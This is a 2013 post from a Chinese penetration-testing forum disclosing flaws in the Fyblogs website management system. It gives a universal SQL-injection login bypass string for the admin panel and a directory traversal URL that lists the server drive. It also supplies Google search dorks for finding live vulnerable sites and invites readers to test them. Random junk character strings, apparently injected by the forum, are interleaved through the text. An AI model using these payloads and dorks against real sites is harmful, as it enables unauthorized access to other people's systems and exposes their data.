中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过6 h, h! ?4 w- S+ f: b6 t

$ j0 h5 S6 K% w$ h/ w: ]& D简要描述:
/ ^  O/ G6 O. R( _+ T6 k! G7 G) {+ [- [
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 b* y! j) d+ k4 l- u  W" t
8 J& }: Q6 p& |% p: h详细说明:3 y& A  U5 D8 q( i2 V9 Z/ y4 h# j- _2 x

7 q# ?! F  c) C# d9 Y后台万能密码 'or'='or'
1 i- [, k+ O- Q( T9 C3 e( J5 \后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!4 ~0 i3 u4 b7 N" h1 ^- |
admin/uploadfile.asp?currentFolder=/upfiles/../
+ c+ g# ~  y4 N& b, ?2 a" X
1 r% Y8 y+ _' Z2 y. t+ ~' b; i* d漏洞证明:
; `+ K+ d" y2 F  l; f
8 ]$ S/ z! ^9 O2 g2 w4 G谷歌:inurl:type.asp?id=1 新闻中心  A+ ]; o5 Q" e4 V5 K9 W6 o1 m
或者 :inurl:download_ok.asp?" c8 @9 s; W1 v; \5 y* M& s6 r

0 e- e3 B! @0 U* k' V可以测试
  [% }/ `& o! \1 k, a( B7 @' I( t- d8 C* m& C& l. f
" {, r4 Z$ S% G1 D7 M! ?





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2